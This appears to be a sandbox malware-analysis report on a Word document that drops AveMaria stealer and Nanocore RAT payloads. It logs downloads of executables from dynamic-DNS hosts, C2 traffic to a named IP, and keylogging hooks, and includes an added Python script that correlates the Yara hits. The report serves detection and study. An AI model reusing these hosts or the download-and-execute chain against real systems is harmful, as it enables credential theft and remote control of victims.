        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040C6BD LocalAlloc,BCryptDecrypt,LocalFree,15_2_0040C6BD
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00411446 FindFirstFileW,FindNextFileW,13_2_00411446
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,13_2_0040955B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00411446 FindFirstFileW,FindNextFileW,15_2_00411446
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040955B GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,15_2_0040955B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041154A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,13_2_0041154A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

        Software Vulnerabilities:

        Document exploit detected (creates forbidden files)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
        Document exploit detected (drops PE files)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: putty[1].exe.0.dr
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1750
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1740
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1678
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1818
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_005A1688
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401853
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401858
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401920
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401780
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h11_2_00401790
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1740
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1750
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1678
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1807
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1818
        Source: C:\ProgramData\images.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_004A1688
        Source: global trafficDNS query: name: newhosteeeee.ydns.eu
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 203.159.80.186:80

        Networking:

        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 203.159.80.186:8234
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 203.159.80.186:8234
        Uses dynamic DNS services
        Source: unknownDNS query: name: hhjhtggfr.duckdns.org
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,13_2_0040290E
        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 203.159.80.186:6703
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:54 GMTContent-Length: 731648
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Sun, 01 Aug 2021 22:25:10 GMTAccept-Ranges: bytesETag: "6ca734172487d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 08:59:57 GMTContent-Length: 731648
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Mon, 02 Aug 2021 07:13:53 GMTAccept-Ranges: bytesETag: "382415f36d87d71:0"Server: Microsoft-IIS/8.5Date: Mon, 02 Aug 2021 09:00:29 GMTContent-Length: 1378816
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,13_2_0040290E
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmp
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /putty.exe HTTP/1.1Host: newhosteeeee.ydns.euConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /microC.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: hutyrtit.ydns.euConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: newhosteeeee.ydns.eu
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/p
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putt
        Source: powershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: httP://newhosteeeee.ydns.eu/putty.exePE
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://ja.com/
        Source: powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://java.co
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmpString found in binary or memory: http://newhosteeeee.ydns.eu
        Source: powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmpString found in binary or memory: http://newhosteeeee.ydns.eu/putty.exe
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner.
        Source: powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: putty.exe, 0000000A.00000002.2115431993.0000000000102000.00000020.00020000.sdmp, putty.exe, 0000000B.00000002.2117025453.0000000000102000.00000020.00020000.sdmpString found in binary or memory: https://antizapret.prostovpn.org/domains-export.txt.GDPI
        Source: putty.exe, images.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

        Key, Mouse, Clipboard, Microphone and Screen Capturing:

        Installs a global keyboard hook
        Source: C:\ProgramData\images.exeWindows user hook set: 0 keyboard low level C:\ProgramData\images.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040813A GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,13_2_0040813A
        Source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmpBinary or memory string: GetRawInputData

        E-Banking Fraud:

        Yara detected AveMaria stealer
        Source: Yara match, File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RAT
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW
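        Added example (not part of the Joe Sandbox report, and not Joe Sandbox tooling): a small Python script that ties the Yara matches listed above back to the processes they came from. The report names the same process two ways, "21.2.images.exe.400000.1.unpack" and "00000015.00000002....sdmp", and the script assumes, from the way those two forms agree throughout this report, that the first field of a .sdmp name is the process index in hexadecimal (0x15 = 21), the second the run number, the fourth the base address of the dumped region and the fifth the Windows PAGE_* protection of that region. Joining the two forms tells you which process index hosts which family and which of them carry an executable-and-writable region at the 32-bit default image base, the footprint of the injected payload the report flags elsewhere. The sample lines are copied from the section above; the field meanings are an inference, not a documented format.

```python
"""Added example: map Joe Sandbox Yara hits back to process indexes and memory protections."""
import re
from collections import defaultdict

# Constructed sample: a subset of the "Yara detected ..." lines copied from this report.
SAMPLE_LINES = """
Yara detected AveMaria stealer
Source: Yara match File source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
"""

HEADER_RE = re.compile(r"^Yara detected (.+?)(?: stealer| RAT)?$")
SOURCE_RE = re.compile(r"File source: (\S+), type: (\w+)")   # also matches the fused "matchFile source:" form
# <index>.<run>.<image>.<base hex>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?\.exe)\.([0-9a-f]+)\.\d+(?:\.raw)?\.unpack$")
# <index hex>.<run hex>.<timestamp>.<base hex>.<protect hex>.<type hex>.sdmp  (field meaning assumed, see lead-in)
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")

# Windows memory protection constants as they appear in the dump name's fifth field.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
IMAGE_BASE = 0x400000   # default 32-bit image base; an RWX region here means the main module was overwritten


def parse_yara_hits(text: str) -> list:
    """One dict per 'File source:' line, tagged with the family of the enclosing heading."""
    hits, family = [], None
    for raw in text.splitlines():
        line = raw.strip()
        h = HEADER_RE.match(line)
        if h:
            family = h.group(1)
            continue
        s = SOURCE_RE.search(line)
        if not s or family is None:
            continue
        src, kind = s.groups()
        u, d = UNPACK_RE.match(src), SDMP_RE.match(src)
        if u:    # unpacked PE: index and run are decimal, image name is present
            hits.append({"family": family, "index": int(u.group(1)), "run": int(u.group(2)),
                         "image": u.group(3), "base": int(u.group(4), 16), "protect": None, "kind": kind})
        elif d:  # memory dump: index and run are hexadecimal, no image name
            hits.append({"family": family, "index": int(d.group(1), 16), "run": int(d.group(2), 16),
                         "image": None, "base": int(d.group(3), 16), "protect": int(d.group(4), 16), "kind": kind})
    return hits


def correlate(hits: list) -> dict:
    """family -> process index -> {image, hits, protections, rwx_at_image_base}."""
    images = {h["index"]: h["image"] for h in hits if h["image"]}   # learned from the .unpack names
    out = defaultdict(dict)
    for h in hits:
        e = out[h["family"]].setdefault(h["index"], {"image": images.get(h["index"], "?"), "hits": 0,
                                                     "protections": set(), "rwx_at_image_base": False})
        e["hits"] += 1
        if h["protect"] is not None:
            e["protections"].add(PAGE_PROTECT.get(h["protect"], hex(h["protect"])))
            if h["protect"] == 0x40 and IMAGE_BASE <= h["base"] < IMAGE_BASE + 0x10000:
                e["rwx_at_image_base"] = True
    return out


if __name__ == "__main__":
    for family, procs in correlate(parse_yara_hits(SAMPLE_LINES)).items():
        for idx, e in sorted(procs.items()):
            print(f"{family:9} index {idx:2} {e['image']:14} hits={e['hits']} "
                  f"rwx@0x400000={e['rwx_at_image_base']} {sorted(e['protections'])}")
```

        Feed it the whole "Yara detected" block of a report and the output is the list of process indexes per family, which is the pivot you want before opening the process tree: here AveMaria lives in putty.exe indexes 13 and 15 and images.exe index 21 with RWX memory at 0x400000, while Nanocore sits in iBCrDCK.i.exe index 34 and a second process, index 36, that only the memory dumps name.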

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Author: unknown
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPE, Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
